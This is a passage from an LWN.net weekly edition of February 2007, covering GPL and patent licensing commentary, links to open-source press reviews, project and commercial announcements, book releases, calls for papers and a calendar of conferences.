Allison: Thats right. I mean essentially, its a patent cross license. They dont call it that. They call it a covenant not to sue with customers. But when you boil it down, and you look at it really closely, it is a patent cross license. And section seven of the GPL specifically states that you cant cut yourself a special patent cross license deal. Essentially its one of those situations where everyone has to hang together not separately, as it were. So, in other words, you cant cut yourself special deals. And as I said, I wanted to like the deal. I had no objections."
Comments (14 posted)
Resources
Matthew Gast
discusses
the addition of timezone processing capabilities to the Asterisk PBX
system in part one of a Linux Journal series.
"
I returned to my idea once I started using Asterisk, because it provides an extensive toolkit for designing PBX-hosted services. Anything that can be coded in a computer can become an Asterisk service. After I understood the basics of Asterisk, I sat down to implement a feature that kept track of the time of day where I visited and prevented calls from coming in at inconvenient times."
Comments (1 posted)
Reviews
Techworld
looks at the Open Linux Router project.
"
The project, called the Open Linux Router, joins some other efforts at bringing open source into the world of routers, notably the Extensible Open Router Platform (XORP) sponsored by Vyatta, but aims to add features such as a file-sharing server and a firewall.
It is the brainchild of four Michigan university students, who acknowledged Vyatta as an inspiration but saw the need for a more expandable, easier-to-use system. The system, like XORP, is intended to run on off-the-shelf hardware, with enough modularity to allow it to run on anything from an embedded device to an enterprise server."
Comments (none posted)
Linux.com
reviews a
game called Frets on Fire. "
You suck on electric guitar. If you are
not aware of that now, you will be after playing Frets on Fire -- a
cross-platform, GPLed music game from Unreal Voodoo, where your PC's
keyboard is the instrument and you play lead. Game play is similar to the
commercial GuitarFreaks and Guitar Hero series. With the backing track to a
song playing, notes scroll towards you in real time on a simplified guitar
fretboard. When they reach the front, you fret the notes in question by
holding down the corresponding keys with your fret hand, and you "pick" the
notes by hitting the Enter key."
Comments (none posted)
KDE.News
looks at the
Decibel chat and phone communication
service architecture that will be part of KDE 4.
"
The goal of Decibel is to create a bridge between different communication technologies. Decibel will make it easy to integrate real-time communication technologies into applications, Tobias says. Decibel provides a central storage place for settings of real-time communications. This will allow one communication application (say, email) to talk to another communication application (say, instant messaging) without having to learn a new language."
Comments (none posted)
O'ReillyNet
looks
at cluster management with openQRM. "
openQRM, which just reached
version 3.1, is an open source cluster resource management platform for
physical and virtual data centers. In a previous life it was a proprietary
project. Now it's open source and is succeeding in integrating different
leading open source projects into one console. With a pluggable
architecture, there is more to come. I've called it "cluster resource
management," but it's really a platform to manage your
infrastructure."
Comments (3 posted)
Rui Lopes
reviews
Linux security tools on Linux.com.
"
System-wide security solutions such as SELinux, AppArmor, Bastille and grsecurity can, in most cases, make your Linux desktop more than reasonably secure. But there are still cases where file or directory encryption is necessary. Here are some tools that can help you when you need to move files outside of your home computer, carry personal data around with you on a pendrive, or send email messages containing sensitive information."
Comments (none posted)
Linux.com
looks at
Sonnet, which will be included in KDE 4.
"
With the Sonnet library for KDE 4, developer Jacob Rideout hopes to reinvigorate the field of desktop linguistics by adding automatic language detection and other innovative features. Sonnet is to be for KDE 4 what KSpell 2 is for the current version of the K Desktop Environment, providing spellchecking facilities to applications as diverse as the Konqueror Web browser, Kopete instant messenger, and KWord office software. Unlike KSpell, however, it will also provide grammar checking, multilingual tools, and perhaps even translation, dictionary, and thesaurus functionality across all of KDE."
Comments (none posted)
Linux-Watch
looks at the
release of paravirtualized network and block device drivers that allow
Windows Server to run unmodified in Xen virtual environments. "
These
device drivers support SUSE Linux Enterprise Server 10 (SLES), and work on
Intel-based server platforms featuring chipsets using Intel-VT
(Virtualization Technology). The new drivers will let customers migrate to
newer and fewer energy-efficient servers, consolidating legacy Windows or
Linux solutions onto virtual servers."
Comments (7 posted)
Miscellaneous
Dave Phillips
covers
a selection of recent news in the Libre audio world. "
It's a mixed
bag this week from Studio Dave. I'll skip the preliminaries and just invite
you to dive in and check out some of the latest news from the
ever-expanding world of Linux sound and music software. There's far more
going on than I can possibly cover in my allotted space, but here's a quick
survey of some recent remarkable activity."
Comments (none posted)
Here's
an
InfoWorld column on the driver troubles being experienced by Windows
Vista users. "
Given how many other companies are similarly
under-delivering on hardware drivers for Vista, it's enough to make you
wonder why more vendors don't do more to support Linux. If writing drivers
for Vista is really this much of a chore, getting open source drivers for
Linux will seem trivial by comparison."
Comments (20 posted)
Here's
a posting by Michael Geist on the International Intellectual Property Alliance's list of countries which, it feels, do not live up to proper IP protection standards. "
These are just fourteen examples - there are dozens more countries on the list, including many developing countries, each invariably criticized for not adopting the DMCA, not extending the term of copyright, not throwing enough people in jail, or creating too many exceptions to support education and other societal goals. In fact, the majority of the world's population finds itself on the list, with 23 of the world's 30 most populous countries targeted for criticism (the exceptions are Germany, Ethiopia, Iran, France, the UK, Congo, and Myanmar)."
Comments (22 posted)
Page editor: Forrest Cook
Announcements
Non-Commercial announcements
The Electronic Frontier Foundation has announced an effort to
support free speech by citizen journalists.
"
The Electronic Frontier Foundation (EFF) told a
judge Wednesday to remove the legal muzzle on citizen
journalists caught up in a court battle over documents
relating to the controversial prescription drug Zyprexa.
EFF argues that the injunction against publication of the
documents online is prior restraint on their free speech
and a violation of First Amendment rights.
EFF's client posted links on a "wiki" to electronic copies
of damaging internal Eli Lilly documents about Zyprexa."
Full Story (comments: none)
The February 13, 2007 edition of the FSFE Newsletter is online
with the latest Free Software Foundation Europe news. Topics include:
FSFE becomes the legal guardian of the OpenSwarm Project,
Transcript of Richard Stallman on the Free Software movement,
Windows Vista released - FSFE recommends switching to GNU/Linux and
Get Active: Join the Revolution!
Full Story (comments: none)
A committee within the OpenSolaris community has been having a long discussion on whether Sun should dual-license the Solaris code, allowing it to be distributed under the terms of either the CDDL or version 3 of the GPL. That committee has now
posted its recommendations: no move to GPLv3 anytime in the near future. "
GPL* licensing OpenSolaris would be yielding to a small vocal
minority of FOSS developers who use the lack of GPL licensing, purely
as a means of fostering FUD towards OpenSolaris and who will, in all
likelyhood, find some other workable mechanism to continue to foster
FUD towards the project."
Comments (70 posted)
The OpenMoko team has sent out an update on the status of its completely
open GSM phone. It seems there have been a number of setbacks which are
delaying the project, but they are still pushing forward. The phone's
software will be opened up on schedule, despite its rougher than desired
condition. General availability of the phone now appears to be September.
Full Story (comments: 11)
The
Open Solutions Alliance has
announced its existence. "
Initially, the OSA will focus its efforts on defining and promoting
tools, frameworks and best practices that facilitate easy deployment and
interoperability between applications. It will also build
'meta-communities' by partnering on projects that involve a variety of
companies, communities and individuals to drive innovation and
collaboration. Finally, the OSA will coordinate joint marketing campaigns
to raise the awareness of business-hardened, open source applications and
solution suites."
Comments (none posted)
The OpenSSL cryptographic module is now certified for use by the
US government.
"
The Open Source Software
Institute (OSSI) announced today the FIPS 140-2 validation of the
OpenSSL FIPS Object Module, a cryptographic library based on the widely
used OpenSSL product. The official validation certificate (#733) is now
posted at the NIST FIPS 140-1 and 140-2 Cryptographic Modules Validation
List".
Full Story (comments: none)
Commercial announcements
ACCESS CO., LTD. has made several announcements at the 3GSM World
Congress where the company is demonstrating its Linux platform
running
on Texas Instruments' OMAP platform and on
Marvell's
consumer electronic devices including feature handsets, smartphones,
GPS navigation systems, and wireless handhelds. The company has also
announced
a Product Development Kit and a pre-release version of its Software
Development Suite and a
Global
Partner Program to expand the mobile Linux market.
Comments (none posted)
Here is
a
press release from BitWay Computadores, EnabledPeople, and IMTECH
Brazil proclaiming the deployment of 50,000 Linux desktops under the
Brazilian government's "Computers For All" program. Another 10,000 systems
are yet to be deployed. The companies appear to have developed their own
distribution: "
Linux XP Desktop is a user-friendly desktop operating
system for home and office users. With a preinstalled version, a user gets
an applications set including OpenOffice package (supports .DOC, .XLS, .PPT
formats), corporate class Evolution e-mail client, Firefox web browser,
multi-protocol GAIM instant messenger and other software. Linux XP Desktop
is RedHat-compatible OS and therefore has a maximum of other software
available." (Thanks to Gary Smith).
Comments (16 posted)
SpikeSource has
announced a partnership agreement.
"
Under this agreement, SpikeSource will certify its applications and
stacks on Ubuntu, and will eventually deliver the entire SpikeSource
application suite on Ubuntu. Users of Ubuntu will benefit from SpikeSource
certified applications and integration as part of a wider Open Source IT
infrastructure."
Comments (none posted)
OpenLogic, Inc. has sent out a
press release
concerning a survey they conducted on the use of open-source software
in business.
"
Key findings:
58% of all respondents have an open source policy, are currently developing one or have a plan to create one.
83% of organizations using more than 25 projects have an open source policy, are currently developing one or have a plan to create one."
Comments (none posted)
Novell and Microsoft have
unveiled
more details about their joint technical roadmap and the benefits customers
can expect from the collaboration. "
"With this first installment of
the Microsoft-Novell development roadmap, we see that both companies are
building on this relationship to develop real, product-specific solutions
to deliver on the promises made to customers," said Al Gillen, research
vice president, System Software, for IDC. "The great potential of the
November announcement between Microsoft and Novell could have been
disappointing without a product-specific roadmap to execute against. With
the roadmap, the technology benefits customers can expect will be tangible
and delivered on a predictable basis.""
Comments (none posted)
Novell and Intel Corporation have announced the availability of
paravirtualized network and block device drivers that will allow Microsoft*
Windows* Server 2000/2003/XP to run unmodified in Xen* virtual environments
on SUSE Linux Enterprise Server 10 from Novell.
Full Story (comments: none)
OpenMoko, the company working toward the creation of a completely-open GSM
phone, has announced the opening of a number of resources, including its
source code repositories and bug tracker, a
public wiki, and more. All can be
reached from the
openmoko.org pages.
Full Story (comments: 7)
Oracle Corporation has
announced a Linux version of its Oracle(R) Communications Billing and Revenue Management enterprise revenue management application.
"
The announcement furthers
Oracle's commitment to deliver world-class application functionality on
Linux."
Comments (none posted)
rPath has announced the availability of rBuilder 3.0 and the rPath
Appliance Platform. "
rPath now provides software vendors complete
appliance lifecycle management -- from creation to deployment to
configuration to maintenance. Together, rBuilder and the rPath Appliance
Platform give software vendors a solution that simplifies software and
drives revenue growth."
Full Story (comments: none)
Userful Corporation has announced the open-source release of its
PreBook PC reservation and usage management system.
"
PreBook allows libraries, Internet cafes, and universities to manage and
track usage on both Windows and Linux client PCs, efficiently controlling
time and usage on their computers. Customers use PreBook to manage all
their computers through a single web-based interface, saving hundreds of
hours and thousands of dollars over competing products."
Full Story (comments: none)
Visual Integrity has released FLY Batch 6.5, a developer
component for automating volume PDF and PostScript file conversion into
web, print and archive formats.
"
The company also cut prices up to 50% on all Linux versions of software to match Microsoft Windows version pricing.
FLY Batch converts any PDF, PostScript or EPS file into a variety of
formats needed for print and web publishing, to meet compliancy
requirements and for archival projects. Scalable vector output formats
include WMF, EMF, SVG, DXF, CGM, HPGL, EPS, and MIF. High-fidelity TIFF,
GIF, PNG, JPEG and BMP image formats are supported and plain formatted
ASCII can be extracted."
Full Story (comments: none)
Vocalscape Networks, Inc. has
announced their participation in the Ekiga softphone project.
"
"Joining the open source community working on the Ekiga softphone
allows Vocalscape to share our experience with VoIP technology and provides
our customers and end-users with added functionality more quickly," said
Ron McIntyre, President of Vocalscape. "Soon, in addition to our Eyefon
softphone for Windows, end-users running Linux operating systems will be
able to make calls on the Vocalscape network. Additionally, the Ekiga
softphone will give users some added functionality such as video calling
and text messaging.""
Comments (none posted)
Xandros has sent out a press release for its "BridgeWays" product: "
...a
new suite of next generation, cross-platform and cross-service,
workflow-driven and rules-based, management products and integration
frameworks." The buzzword storm does not relent anywhere through
the release - it is a masterpiece of the art. But we not really been able
to figure out what the product does...
Full Story (comments: 5)
New Books
SitePoint has published the book
Build Your Own Ruby on Rails Web
Applications by Patrick Lenz.
Full Story (comments: none)
Pragmatic Programmers has published the book
Rails for Java Developers by Stuart Halloway and Justin Gehtland.
Full Story (comments: none)
Education and Certification
The Linux Professional Institute will offer discounted
certification exams to attendees of the FOSDEM 2007 conference
in Brussels, Belgium on February 24 and 25.
"
Exams will be in the English
language and include all LPIC-1 (101 and 102), LPIC-2 (201 and 202),
LPIC-3 (301, 302) and MySQL certification exams. This will be the first
time in the world that paper versions of LPI's new LPIC-3 exams will be
offered."
Full Story (comments: none)
Calls for Presentations
A
Call For Papers
has gone out for GUADEC 2007.
"
The GNOME Users and Developers European Conference (GUADEC) invite you
to participate in the 8th annual conference on the 15-21st July 2007 in
Birmingham, England.
The deadline for proposals is Monday 12th March."
Comments (none posted)
A call for papers has gone out for
IT-Incident Management and IT-Forensics 2007.
The event will take place in Stuttgart, Germany on September 11-12, 2007.
Full Story (comments: none)
A Call for Papers has gone out for PAKCON III.
The event will take place in Karachi, Pakistan on May 26, 2007,
submissions are due by April 5.
Full Story (comments: none)
Upcoming Events
KDE.News
has announced
a
Call for Sponsorship
for Akademy 2007.
"
aKademy is the KDE World Summit, this year taking place in Glasgow at the end of June. Sponsorship is an opportunity to promote your company or product to the developers, users, deployers and consultants who will attend the conference. It will also provide a marketing avenue for your company to the thousands who read our website and publications. Most importantly, it gives vital support which ensures that hundreds of KDE contributors can meet together to plan the future of the free desktop."
Comments (none posted)
The Libre Graphics Meeting 2007 will take place in Montreal, Quebec,
Canada on May 6, 2007.
"
This year's LGM provides a venue where FLOSS graphics application
developers, users and professional artists from all over the world meet
to discuss collaboration, outline the future of the projects together,
with the goal of increasing interaction between developers, professional
graphics artists and print professionals to improve the steadily expanding
FLOSS graphics' application ecosystem."
Full Story (comments: none)
The Linux Users' Group of Davis has announced the next
Linux Installfest workshop. The event takes place in Davis, California
on February 18, 2007.
Full Story (comments: none)
The Network and Distributed Systems
Security conference will take place from February
28 to March 2, 2007 in San Diego, CA. "
NDSS is a traditional scholarly academic security conference with a peer
reviewed track of papers. However, this year we have made a special effort to make NDSS more
relevant to security practitioners by adding an invited talks track
focused on security threats by some leading practitioners."
Full Story (comments: none)
A Call for Participation has gone out for RailsConf Europe 2007.
"
To meet the increasing demand for skill
building, and to spread the joy of Rails, Ruby Central and O'Reilly Media
are teaming up to produce RailsConf Europe 2007, an entire conference
dedicated to Ruby on Rails. Happening September 17-19 in Berlin, Germany,
RailsConf Europe will offer keynotes, sessions, and tutorials from the
most innovative and successful Rails experts and organizations."
Full Story (comments: none)
Events: February 22, 2007 to April 23, 2007
The following event listing is taken from the
LWN.net Calendar.
| Date(s) | Event | Location |
February 19 February 23 |
DebianEDU DevCamp |
Soissons, France |
| February 22 |
PyCon Tutorial Day |
Addison, Texas, |
| February 22 |
CELF Japan Linux Technical Jamboree #13 |
Tokyo, Japan |
February 22 February 24 |
OpenMind 2007 |
San Giorgio a Cremano, Naples, Italy |
February 23 February 25 |
PyCon 2007 |
Addison, Texas, |
| February 23 |
PHP Conference UK 2007 |
London, England |
February 24 February 25 |
Free and Open Source Software Developers' European Meeting |
Brussels, Belgium |
February 24 February 25 |
Java/DevJam/2007/Fosdem |
Brussels, Belgium |
February 26 March 1 |
PyCon Sprints |
Addison, Texas, |
February 26 March 2 |
PHP5 Bootcamp Training at the Big Nerd Ranch |
Atlanta, Georgia, USA |
February 27 March 1 |
O'Reilly Emerging Telephony Conference |
San Francisco, CA, |
February 27 March 2 |
EUSecWest Applied Security Conference |
London, UK |
February 28 March 2 |
Network and Distributed System Security Symposium |
San Diego, CA, USA |
March 2 March 3 |
LinuxForum 2007 |
Copenhagen, Denmark |
March 3 March 8 |
O'Reilly Emerging Technology Conference |
San Diego, CA, USA |
March 5 March 8 |
EclipseCon 2007 |
Santa Clara, CA, USA |
March 5 March 6 |
Karlsruhe Workshop on Software Radios |
Karlsruhe, Germany |
March 8 March 10 |
2007 Open Source Think Tank |
Napa, CA, USA |
March 10 March 13 |
Camp 5 Advanced Zope3 Training |
Charlotte, North Carolina, USA |
March 12 March 16 |
QCon |
London, England |
March 12 March 16 |
Third Annual Security Enhanced Linux Symposium |
Baltimore, US |
March 12 March 14 |
BOSSA Conference |
Porto de Galinhas, Brazil |
March 13 March 14 |
The Linux Foundation Japan Symposium |
Tokyo, Japan |
March 14 March 16 |
PHP Quebec Conference |
Montreal, Canada |
March 14 March 17 |
Barbeque Sprint for Plone3 |
Charlotte, North Carolina, USA |
March 15 March 21 |
CeBIT computer fair |
Hannover, Germany |
March 16 March 17 |
MountainWest RubyConf |
Salt Lake City, USA |
March 18 March 23 |
Novell BrainShare 2007 |
Salt Lake City, Utah, USA |
March 19 March 21 |
UKUUG LISA/Spring Conference 2007 |
Manchester, UK |
March 22 March 25 |
Linux Audio Conference |
Berlin, Germany |
March 23 March 25 |
ShmooCon |
Washington DC, USA |
March 23 March 25 |
Guademy |
Coruña, Spain |
| March 24 |
FSF Associate Membership Meeting |
Cambridge, MA, USA |
March 26 March 29 |
Emerging Technology Conference |
San Diego, CA, USA |
April 1 April 4 |
International Lisp Conference 2007 |
Cambridge, England |
April 1 April 5 |
Embedded Systems Conference |
San Jose, CA, USA |
| April 1 |
GPLv3: Improving a Great Licence (discussion draft 3) |
Brussels, Belgium |
April 2 April 6 |
DJango Bootcamp |
Atlanta, Georgia, USA |
April 2 April 5 |
Hack in The Box Security Conference 2007 |
Dubai, United Arab Emirates |
April 3 April 8 |
Make Art 2007 |
Poitiers, France |
April 12 April 14 |
International Free Software Forum (Forum
Internacional Software Livre) |
Porto Alegre, Brazil, |
April 14 April 15 |
Ruby and Python Conference 2007 |
Poznan, Poland |
April 15 April 18 |
Gelato ICE: Itanium® Conference & Expo |
San Jose, California, USA |
April 17 April 19 |
Embedded Linux Conference |
San Jose, USA |
April 18 April 20 |
CanSecWest Applied Security Conference 2007 |
Vancouver, Canada |
| April 19 |
Linux 2007 |
Lisbon, Portugal |
| April 19 |
Power Architecture Software Summit |
Austin, TX, USA |
April 20 April 22 |
International Conference on Availability, Reliability and Security
Conference on Availability, Reliability and Security |
Vienna, Austria, |
April 20 April 22 |
Penguicon 5.0 Open Source Software & Science Fiction Convention |
Troy, Michigan, USA |
| April 21 |
Romanian Open Source Development Meeting |
Bucharest, Romania |
If your event does not appear here, please
tell us about it.
Audio and Video programs
O'Reilly presents
a podcast from the Web 2.0 Summit.
"
Web 2.0 Summit program chair John Battelle moderated a public policy discussion with Art Brodsky, the communications director of Public Knowledge, Ebay's Tod Cohen and Amazon.com's Paul Misener."
Comments (none posted)
Page editor: Forrest Cook